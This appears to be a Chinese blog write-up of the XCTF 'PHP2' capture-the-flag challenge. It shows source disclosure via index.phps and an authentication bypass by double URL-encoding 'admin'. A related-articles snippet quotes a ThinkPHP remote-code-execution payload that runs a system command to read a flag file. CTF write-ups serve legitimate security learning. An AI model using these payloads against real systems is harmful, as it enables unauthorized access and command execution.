XCTF-高手进阶区:PHP2

最新推荐文章于 2024-04-11 00:02:17 发布
最新推荐文章于 2024-04-11 00:02:17 发布
阅读量3.6k 收藏 3
点赞数 1
分类专栏: CTF刷题 文章标签: XCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41617034/article/details/91969127
版权

XCTF-高手进阶区:PHP2

在这里插入图片描述

目标:

Writeup

(1)首先我们用dirsearch.py进行网站目录搜索

在这里插入图片描述

(2)我们发现有个index.php,我们访问一下,没有结果...

那么我们看看能否看看该网页php地源码,这里用到了.phps

.phps后缀释义:
phps文件就是php的源代码文件。
通常用于提供给用户(访问者)查看php代码,因为用户无法直接通过Web浏览器看到php文件的内容,所以需要用phps文件代替
(3)于是我们访问index.phps,看到下图所示:

在这里插入图片描述

(4)好的,接下来我们来分析可以获得key值即flag值的核心源码
  • 第一步:观察源码
not allowed!

"); exit(); } $_GET[id] = urldecode($_GET[id]); if($_GET[id] == "admin") { echo "

Access granted!
"; echo "

Key: xxxxxxx
"; } ?> Can you anthenticate to this website?
  • 第二步:我们需构造id=admin,浏览自动对id值进行一次解码,结果还是admin
$_GET[id]=urldecode(admin);//这里的admin是浏览器对id值自动进行一次解码后的值
if("admin"=="admin")$_GET[id]="admin";
if("admin"=="admin")//true

这样就OK了,我们来测试一下:
在这里插入图片描述
嗯?这是为什么呢?难道后端代码对admin字符进行了过滤?不让传admin字符?

ctrl+U看到完整php代码是:
<?php
if("admin"===$_GET[id]) {
  echo("<p>not allowed!</p>");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin")
{
  echo "<p>Access granted!</p>";
  echo "<p>Key: xxxxxxx </p>";
}
?>

Can you anthenticate to this website?

先尝试了0==admin返回true,但是失败了,看来可能只能admin==admin才能输出flag?,但又要不满足"admin"===$_GET[id],该如何?

行吧,那我们尝试一下对admin进行url编码吧
  • 第三步:再次构造payload
    注意:浏览器在上传数据时,会对参数值进行一次解码(与php代码无关,是浏览器自身会解码一次)
    admin第一次url编码:%61%64%6D%69%6E
我们url传参时:
$_GET[id]=urldecode(admin);//这里的admin是浏览器对id值自动进行一次解码后的值
if($_GET[id]=="admin")$_GET[id]="admin";
if("admin" == "admin")//true

由上面分析的代码可以知道,%61%64%6D%69%6E经过浏览器的一次自动解码,变成admin,之后又当作id的值传入代码中,经过urldecode,admin还是admin,服务器后端依旧会过滤admin

  • 第四步:因此,我们需要二次编码,浏览自动对id值进行一次解码,结果id在传输过程中变为id=%61%64%6D%69%6E
    admin二次编码值:%25%36%31%25%36%34%25%36%44%25%36%39%25%36%45
$_GET[id]=urldecode(%61%64%6D%69%6E);//这里的%61%64%6D%69%6E是浏览器对id值自动进行一次解码后的值
if($_GET[id]=="admin")$_GET[id]="admin";//这里的admin是php代码中urldecode函数对%61%64%6D%69%6E进行解码的结果
if("admin" == "admin")//true

这样,%61%64%6D%69%6E就不会被过滤了

(6)最后:我们访问

http://111.198.29.45:41202/?id=%25%36%31%25%36%34%25%36%44%25%36%39%25%36%45

注:下图中原本是输入的%25%36%31%25%36%34%25%36%44%25%36%39%25%36%45,因为浏览器自动一次解码变成了%61%64%6D%69%6E
在这里插入图片描述
注:此题%2561dmin也可以,一次解码后为%61,二次解码后为a。
%2561=%25%36%31,也可以看出,解码只会解%后面的两位数,其它数值没有%不解码

1stPeak
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
XCTF-WEB进阶-PHP2
Lorezon的博客
03-14 140
打开题目发现只有一行字: 既然没什么有用的信息就看看常见的index页面,但是发现依然没有什么有用的信息,查看忽略的phps页面,有了结果: 得到了代码,查看源码进行分析 <?php if("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode($...
XCTF-WEB进阶php_rce
Lorezon的博客
03-15 285
打开题目出现网页: 在网上查了TinkPHP的漏洞复现,得到payload如下: ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27 漏洞复现具体...
xctf php2,XCTF php2
weixin_42117032的博客
03-27 261
初次进入环境,出现如下图所示界面先在域名中输入index.php欲要查看主页面,结果依旧是上述界面,此时,将php改为phps,尝试查看php源码,如下图所示出现源码,代码审计,可以看出,get接受id=admin时,会出现key值,即可能出现flag,但是,当输入“?id=admin”时会提示错误,故此,想到可能admin 被设为了敏感字符,造成了只要识别到admin就会报错,因在url中提交,...
CTF_EXP02:XCTF PHP2
Senimo
10-13 269
CTF_EXP02: XCTF PHP2 题目:XCTF PHP2 启动靶机,打开环境: 你能浏览这个网站嘛? 首先访问index.php,可以正常访问,尝试查看index.phps文件(.phps文件就是php的源代码文件,通常用于提供给访问者查看php代码): 得到网页的源代码,分析代码: 需要传入变量id的值,不能等于admin,经过URL解码后等于admin将输出key,因为服务器会进行一次URL解码,所以我们将admin进行二次编码: 得到最后的传输值为: ?id=%2561%2564%2
【攻防世界】PHP2,2024年最新【工作经验分享
最新发布
2401_84240369的博客
04-11 1783
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;urldecode是PHP函数,解码经过URL编码的字符串,解码回原始的形式;
XCTF php2
qq_41941506的博客
05-13 3459
初次进入环境,出现如下图所示界面 先在域名中输入index.php欲要查看主页面,结果依旧是上述界面,此时,将php改为phps,尝试查看php源码,如下图所示 出现源码,代码审计,可以看出,get接受id=admin时,会出现key值,即可能出现flag,但是,当输入“?id=admin”时 会提示错误,故此,想到可能admin 被设为了敏感字符,造成了只要识别到admin就会...
攻防世界PHP2详细解答
m0_74047686的博客
03-13 4341
1.后缀名为.phps的文件:phps即php source,phps文件就是php的源代码文件,通常用于提供给用户查看php代码,因为用户无法通过web浏览器直接查看到php文件的内容,所以需要用phps文件代替2.在传入参数时,浏览器会对非ASCII编码进行一次urlencode,结果在代码执行时,相当于id还是admin,所以我们在传参时需要进行两次URL编码3.在URL编码中, "%" 符号是一个特殊字符,它被用来表示接下来的两个字符是一个ASCII值的十六进制表示。
xctf php2
qq_45694932的博客
07-15 133
id经过一次服务器url解码和urldecode解码以后=admin即可输出正确key。参数id URL解码也以后也不能是admin(因为服务器会进行一次URL解码)访问index.phps可以查看页面源码。所以我们将admin两次url加密即可。好久没打CTF了,随便做一道练练手。试着访问一下index.php页面。这里我找了很多在线工具都不好使。参数id不能等于admin。
XCTF-2019-tfboys:XCTF 2019最终网络任务“ tfboys”的源代码
05-18
XCTF-2019-tfboys tfboys又名TensorFlow Boys 部署(Python3) pip install -r requirements.txt cd web3 python run.py 迪尔斯 web3/model/default/ : pre-trained LSTM model. exploit/exploit.ipynb : codes...
XCTF-RE】新手练习-no-strings-attached-解压密码:十三陵陈飞宇.rar
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/qffkcv
XCTF-mobile app2
01-03
app2-安卓逆向1.提取文件2.分析文件3.分析XML文件4.经过验证得到flag5.其他解法 下载地址:点此下载 1.提取文件 更改app安装包后缀为zip 把这3个文件解压出来 然后使用dex2jar将dex文件转换为jar文件,得到一个jar...
XCTF-RE】新手练习-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
XCTF-Mobile】新手练习-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
攻防世界-Web-PHP2
七堇年的博客
04-15 3866
PHP2 文章目录PHP2 题目考点: 题目考的是对信息的简单收集,找到源码,并对id参数值admin进行二次加密 解题步骤 首先进入页面后发现一串英文:Can you anthenticate to this website? ,他的意思是你能登录这个网站吗?,那么说明应该有隐藏的登陆页面,利用工具dirsearch进行扫描 这里我们发现了index.php页面,访问 还是这句话,并且源代码中没有东西 此时我们可以利用phps进行源码查看 接下来观察回显内容 not allo
CTF_Web:攻防世界高手进阶题WP(9-14)
AFCC_的博客(Web_Dog)
08-08 3066
持续更新ing 0x09 PHP2 题目只有一句话,Can you anthenticate to this website?,其实说实话没什么思路,根据dirsearch的结果,只有index.php存在,里面也什么都没有,各路前辈说index.phps存在源码泄露,于是看了看。 <?php if("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode
PHP2(phps)- URL编码解码原理
Welcome To Myon'Blog !
03-15 1113
PHP2、phps文件 URL解码、URL编码、代码审计、脚本编写、 ASCII与16进制见的相互转换
【攻防世界-Web进阶篇-004PHP2】
gyy990526的博客
03-14 2029
解:打开靶机出现一句话,Can you anthenticate to this website?你能浏览这个网站么 正常思路就是F12看看有没有什么提示,发现没有,那就进一下index.php试一试还是没有变化,就算有变化可能也是被藏起来了,那就试试有没有源代码.phps文件,发现有源代码,接下来就是审计环节了。 如果id严格等于admin就会提示你不允许登录,也就是?id=admin 下面是对id的一次解码后再对其进行与admin的比较,那咱们也就是需要对admin进行一次加密,但值.
攻防世界web进阶刷题记录(1)
bmth666的博客
03-27 4627
文章目录webbaby_webTraining-WWW-Robotsphp_rceWeb_php_include方法1方法2方法3warmupNewsCenter web baby_web 提示是:想想初始页面是哪个 进入是一个hello world,然后就没有了,由于提示试试抓包,得到flag Training-WWW-Robots 由于提示我们就查看robots.txt 获得flag p...
攻防世界WEB进阶PHP2
harry_c的博客
07-31 6260
攻防世界WEB进阶PHP2第一步:分析第二步:实操第三步:答案 难度系数: 1星 题目来源: 暂无 题目描述:暂无 第一步:分析 根据题目,没有给出任何信息,直接是一个场景,点击打开场景页面我们发现是一串文字:Can you anthenticate to this website? 第二步:实操 首先想到尝试index.php,未果。再尝试index.phps,成功发现了代码泄露。 <?...
xctf supersqli
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入漏洞来获取敏感数据或者执行非授权操作。这个题目可以帮助参与者提升对于 SQL 注入漏洞的理解和防御能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1stPeak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值